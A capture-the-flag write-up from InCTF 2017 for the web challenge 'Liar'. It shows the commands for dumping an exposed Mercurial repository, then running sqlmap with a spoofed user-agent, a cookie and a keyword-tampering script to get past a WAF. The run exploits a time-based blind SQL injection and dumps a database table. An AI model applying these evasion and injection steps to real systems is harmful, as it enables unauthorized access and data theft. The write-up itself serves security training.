Version
By
Version
Comment
noraj
1.0
Creation
CTF
Name : InCTF 2017
Website : ctf.inctf.in
Type : Online
Format : Jeopardy
CTF Time : link
300 - Liar - Web
We don't have anything in our website.
Link
The is a VCS exposed by the web server.
Git is not the only VCS, here we have a mercurial repository.
I used DVCS-ripper to dump the repository:
$ ~/CTF/tools/dvcs-ripper/rip-hg.pl -v -u http://liar.inctf.in/.hg/
[i] Downloading hg files from http://liar.inctf.in/.hg/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[d] found 00changelog.i
[d] found dirstate
[d] found requires
[d] found branch
[!] Not found for branchheads.cache: 404 Not Found
[d] found last-message.txt
[!] Not found for tags.cache: 404 Not Found
[d] found undo.branch
[d] found undo.desc
[d] found undo.dirstate
[d] found store/00changelog.i
[!] Not found for store/00changelog.d: 404 Not Found
[d] found store/00manifest.i
[!] Not found for store/00manifest.d: 404 Not Found
[d] found store/fncache
[d] found store/undo
[!] Not found for .hgignore: 404 Not Found
[i] Running hg status to check for missing items
[i] Got items with hg status: 3
[!] Not found for store/data/.hgignore.d: 404 Not Found
[!] Not found for store/data/.hgignore.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.i: 404 Not Found
[!] Not found for store/data/index.html.d: 404 Not Found
[d] found store/data/index.html.i
[i] Finished (1 of 4)
We can see there are other files on the web server (not available on the mercurial repository).
$ hg status
! .hgignore
! 1ts_h4rd_t0_gu3ss/index.html
! 1ts_h4rd_t0_gu3ss/vulnerable.php
1ts_h4rd_t0_gu3ss/index.html
has a form that send to 1ts_h4rd_t0_gu3ss/vulnerable.php
and there is a comment hidden in the sources
<!--Could You beat our security!!!--!>
<!--Can you find the phone number of my friend, I guess it is stored in some table, I think it is in phone column--!>
So there is an SQL injection.
I tried manually to test if some stuff were filtered.
I saw that all SQL kerwords were detected by a WAF but using versionned keywords worked.
Then I tried with SQLmap but the WAF detected an automated tool so I told SQLmap to use a custom user-agent and to use my cookie.
Then we have a classic time-based blind SQLi.
$ sqlmap -u http://liar.inctf.in/1ts_h4rd_t0_gu3ss/vulnerable.php --method=POST --data='name=john' --dump --user-agent='Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0' --cookie='__cfduid=da3d6e025cbfedf0e2f3e6a695f45bdaf1513502488' --tamper=versionedkeywords --dbms=mysql -v 3 --level 2 --risk 3
[...]
Parameter: name (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: name=john') OR SLEEP(5) AND ('PuTF'='PuTF
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
[...]
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[...]
Database: CTF
Table: gu3ss1ng_must_n0t_h4pp3n
[5 entries]
+--------------------------------+----------------+---------+
| phone | email | user |
+--------------------------------+----------------+---------+
| 12345 | admin@bi0s.com | <blank> |
| inctf{H0w_@b0Ut_@n_r3@L_1nJ3c} | InCTF flag | <blank> |
| 100 | rahul@bi0s.com | <blank> |
| 900 | ram@google.com | <blank> |
| 123456 | ram@yahoo.com | <blank> |
+--------------------------------+----------------+---------+
[...]